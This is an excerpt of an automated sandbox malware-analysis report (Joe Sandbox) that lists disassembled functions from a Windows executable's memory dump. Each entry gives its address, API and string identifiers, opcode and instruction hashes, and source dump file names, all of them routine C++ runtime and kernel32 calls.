                                                                                                                                                                  • Opcode Fuzzy Hash: 11555719de460d759cd9ce52645ae0ad9069b738f064280b2c47e42908dc881e
                                                                                                                                                                  • Instruction Fuzzy Hash: 3DF1D462F18B8145FB14EB64D8443ACA361EB657E4F905732DEAC13AD7DE78E0C1CA50
                                                                                                                                                                  Function 00007FF72C9FDEC8 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 407COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: 0$0$0
                                                                                                                                                                  • API String ID: 3215553584-3137946472
                                                                                                                                                                  • Opcode ID: 9d0da343a1475c20010ef155d6f5fda03df1a6debcc8e1fbbf282866201055c9
                                                                                                                                                                  • Instruction ID: 63d2d7ed8069bcfb17b89b4c4a1fc9054682a9fedfbdaa341e8bef3cd5c3c2e8
                                                                                                                                                                  • Opcode Fuzzy Hash: 9d0da343a1475c20010ef155d6f5fda03df1a6debcc8e1fbbf282866201055c9
                                                                                                                                                                  • Instruction Fuzzy Hash: ECE1E83290D6C685F761AF288C942FDBB9DDB317A4FD88032C6CC47785DE2DA5598B20
                                                                                                                                                                  Function 00007FF72C9B4790 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 330COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_destroy__std_fs_code_page
                                                                                                                                                                  • String ID: ", "$*L\(&.$: "
                                                                                                                                                                  • API String ID: 2261858363-377368453
                                                                                                                                                                  • Opcode ID: 4c2c1f16b9bcb1608803fa57558e3b5461482a9100175eb3ba717f400800e487
                                                                                                                                                                  • Instruction ID: 220f073978a0137d28d20a8924a5ba13318aec634fe2829dd136700abde862e9
                                                                                                                                                                  • Opcode Fuzzy Hash: 4c2c1f16b9bcb1608803fa57558e3b5461482a9100175eb3ba717f400800e487
                                                                                                                                                                  • Instruction Fuzzy Hash: 65D1C172B14B8195EB04EF69E8443ACA361EB65FE8F904032DB8D17B99DF39D480C794
                                                                                                                                                                  Function 00007FF72C9C5A60 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                  • String ID: replacement $*L\(&.$Nothing found
                                                                                                                                                                  • API String ID: 4261731725-278487610
                                                                                                                                                                  • Opcode ID: fa8d2c0a2f398226edcdbe6cf9692cf2ad42a516f9cc044238f705f772e52f0e
                                                                                                                                                                  • Instruction ID: 6f2fc6f51912b0bf3e155274d7aa42958c9b4ae0dff080dd5e47cb629c925281
                                                                                                                                                                  • Opcode Fuzzy Hash: fa8d2c0a2f398226edcdbe6cf9692cf2ad42a516f9cc044238f705f772e52f0e
                                                                                                                                                                  • Instruction Fuzzy Hash: 85C10672F18B4585EB10EB65D8043ADA371EB687B4F904632DAAC17BD9DF38E580CB50
                                                                                                                                                                  Function 00007FF72C9E7020 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 157COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                  • String ID: bad locale name$false$true
                                                                                                                                                                  • API String ID: 4121308752-1062449267
                                                                                                                                                                  • Opcode ID: 9ae2675ba7d95624bf328835baefa128cf3f40f026041a730d7a5e0cb3dcf7a3
                                                                                                                                                                  • Instruction ID: 29637c1ef8aff10448581685d4c921f2ee58c1ef0faaa79d3eedf1f5a491a6df
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ae2675ba7d95624bf328835baefa128cf3f40f026041a730d7a5e0cb3dcf7a3
                                                                                                                                                                  • Instruction Fuzzy Hash: 7961A022A0D7828AFB10EFB0A8503BC72B5EF60718F844035DE8C27B95DF39A456D765
                                                                                                                                                                  Function 00007FF72C9F5800 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 310COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                  • String ID: *L\(&.$csm$csm$csm
                                                                                                                                                                  • API String ID: 849930591-732470473
                                                                                                                                                                  • Opcode ID: 0902fee2bd272c2c2419d964ebaf25cd8e49d6c6d5d53ec91bdd45b6b3ecc3a1
                                                                                                                                                                  • Instruction ID: c36ca9a382ae750d94521f803fbe5c1fbf7eeea70ed8096bffdd905f31f4afdf
                                                                                                                                                                  • Opcode Fuzzy Hash: 0902fee2bd272c2c2419d964ebaf25cd8e49d6c6d5d53ec91bdd45b6b3ecc3a1
                                                                                                                                                                  • Instruction Fuzzy Hash: 8ED173729087418AEB20EB65D8403BDB7A8FB657A8F900136DECD57755DF38E491CB10
                                                                                                                                                                  Function 00007FF72CA088F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF72CA091C8,?,?,?,?,00007FF72CA01FDD,?,?,?,?,00007FF72C9EEAF8), ref: 00007FF72CA08A6C
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF72CA091C8,?,?,?,?,00007FF72CA01FDD,?,?,?,?,00007FF72C9EEAF8), ref: 00007FF72CA08A78
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                  • String ID: *L\(&.$api-ms-$ext-ms-
                                                                                                                                                                  • API String ID: 3013587201-1426591958
                                                                                                                                                                  • Opcode ID: 87bea0995d79addeec59c8d507c887efab68793b560fa11f00cb5242ca2bc547
                                                                                                                                                                  • Instruction ID: 773816260ea3a3e316064127d5f8e206918de5c04ea4a94ef071b3abccae16c9
                                                                                                                                                                  • Opcode Fuzzy Hash: 87bea0995d79addeec59c8d507c887efab68793b560fa11f00cb5242ca2bc547
                                                                                                                                                                  • Instruction Fuzzy Hash: 59412321B19A1282FA15EB26BC50B75A3B1FF24BF0F890135DD0D57B88EE3CE4448B64
                                                                                                                                                                  Function 00007FF72CA06F84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2506987500-578493202
                                                                                                                                                                  • Opcode ID: 38d3d1c3250ffd50d4266543b17c4889617fb9a30c2085a6b1b106691bd638d9
                                                                                                                                                                  • Instruction ID: 189e329b96a5123c0a5e8eb3d55944e98b16b875390907f039a2d31578222ee7
                                                                                                                                                                  • Opcode Fuzzy Hash: 38d3d1c3250ffd50d4266543b17c4889617fb9a30c2085a6b1b106691bd638d9
                                                                                                                                                                  • Instruction Fuzzy Hash: E0216D20A0965242FA987735BD51A39D272DF64BF0F840734E93E4B6C6DE2CB4418A25
                                                                                                                                                                  Function 00007FF72C9F1D60 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                  • API String ID: 667068680-1247241052
                                                                                                                                                                  • Opcode ID: c9ca5811517390810536183ba872c98996ed66007aa42ec6ddc9aee17bf1dbed
                                                                                                                                                                  • Instruction ID: 7822264a907bad4496e845c47e0c8081b52b7de91412eb15f77cd64f8fc9e9db
                                                                                                                                                                  • Opcode Fuzzy Hash: c9ca5811517390810536183ba872c98996ed66007aa42ec6ddc9aee17bf1dbed
                                                                                                                                                                  • Instruction Fuzzy Hash: FEF0B274A19B1382EA04EB61FC99860A3B1FB38761FC00032C91D53728EF3CA0558BA1
                                                                                                                                                                  Function 00007FF72C9F1ED8 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiStringWide
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2829165498-578493202
                                                                                                                                                                  • Opcode ID: 91ee02c4c85d36a2e0f044f961741b28f5d108ddf279dbaeba9061c73f13f888
                                                                                                                                                                  • Instruction ID: a2d87abfbae111515706df773f30ff87f664e187145de3b98f09dd26aef351fc
                                                                                                                                                                  • Opcode Fuzzy Hash: 91ee02c4c85d36a2e0f044f961741b28f5d108ddf279dbaeba9061c73f13f888
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D81A172A08B4186EB20AF15EC40369B2E9FF647B4F944635EA9D47BD8DF3CD4418B60
                                                                                                                                                                  Function 00007FF72C9F21D4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00007FF72C9F2225
                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF72C9F1192,?,?,?,00007FF72C9D9640), ref: 00007FF72C9F2244
                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF72C9F1192,?,?,?,00007FF72C9D9640), ref: 00007FF72C9F2266
                                                                                                                                                                  • sys_get_time.LIBCPMT ref: 00007FF72C9F2281
                                                                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF72C9F1192,?,?,?,00007FF72C9D9640), ref: 00007FF72C9F22A7
                                                                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF72C9F1192,?,?,?,00007FF72C9D9640), ref: 00007FF72C9F22BF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThreadsys_get_time
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 184115430-578493202
                                                                                                                                                                  • Opcode ID: aff59c7da1a817e9fd2f999baedb90512d5d413d8c3d5ceba67cde38630bac77
                                                                                                                                                                  • Instruction ID: 3ba14b8a295b540cda2fa1385840e813cd8581f2efffd46e7952e51fe00ef18d
                                                                                                                                                                  • Opcode Fuzzy Hash: aff59c7da1a817e9fd2f999baedb90512d5d413d8c3d5ceba67cde38630bac77
                                                                                                                                                                  • Instruction Fuzzy Hash: 09413232918E82C6E768EF14E84037CB364FB64B64F804135D68D46698DF7CE855CFA1
                                                                                                                                                                  Function 00007FF72C9E6B70 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2081738530-578493202
                                                                                                                                                                  • Opcode ID: caa3c6f710cb8e278486d4d65da6a2ceeae2fd877d4b1f4ee0f7164d5ff37b9c
                                                                                                                                                                  • Instruction ID: 38ebce1f1b27031becdbd6b8f902000aaa7ce71ce7a0fe9c132c956c7a2ae026
                                                                                                                                                                  • Opcode Fuzzy Hash: caa3c6f710cb8e278486d4d65da6a2ceeae2fd877d4b1f4ee0f7164d5ff37b9c
                                                                                                                                                                  • Instruction Fuzzy Hash: E9315F22A0CA8585EA60BF15EC5117AB370FB74BB4F984137DACD076A6DE3CE441CB60
                                                                                                                                                                  Function 00007FF72C9D72E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2081738530-578493202
                                                                                                                                                                  • Opcode ID: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
                                                                                                                                                                  • Instruction ID: ec7b64631a50539443ea13454d8d4be589d6bff56e4de90231c9f6defce3ae27
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E315422A0CA4181EB10FB15FC54569F371FB647B4F980132DA9D076E9DE3DE491CB60
                                                                                                                                                                  Function 00007FF72CA05EC0 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: f$p$p
                                                                                                                                                                  • API String ID: 3215553584-1995029353
                                                                                                                                                                  • Opcode ID: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
                                                                                                                                                                  • Instruction ID: 291d836e62c2c9b177406e872983926a28c55aff0c2554a1311680411a08b0a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
                                                                                                                                                                  • Instruction Fuzzy Hash: AD12A361E0816386FB247E28B954BB9F6B1FB607B8FC44135DA89476C4DB3DE5808F24
                                                                                                                                                                  Function 00007FF72C9F5CD0 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 320COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                  • String ID: *L\(&.$csm$csm$csm
                                                                                                                                                                  • API String ID: 3523768491-732470473
                                                                                                                                                                  • Opcode ID: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
                                                                                                                                                                  • Instruction ID: eb5650a1782541208ecfa554aa87767240075be3fec505fcf2028b4ab74ff135
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
                                                                                                                                                                  • Instruction Fuzzy Hash: BDE1A572A087818AE720EF24D8812BDB7B8FB65768F940135DACD47656DF38E585CF20
                                                                                                                                                                  Function 00007FF72CA0E6AC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.$*L\(&.$*L\(&.$*L\(&.$*L\(&.
                                                                                                                                                                  • API String ID: 3215553584-3136492305
                                                                                                                                                                  • Opcode ID: 059a6e08268c2f9faa8372692d1d41bcdcabe47e84e6cf3d2dc5b30d4cf9302e
                                                                                                                                                                  • Instruction ID: 2e7182f937c7af8f6c209e151f741ee76bcebc3da8bd8cbd4edf0b06bf27ace3
                                                                                                                                                                  • Opcode Fuzzy Hash: 059a6e08268c2f9faa8372692d1d41bcdcabe47e84e6cf3d2dc5b30d4cf9302e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F61A521D2868242F668BB35BD44B39E6B0FFA07E5F944535CA8D13794DE3CF805AE20
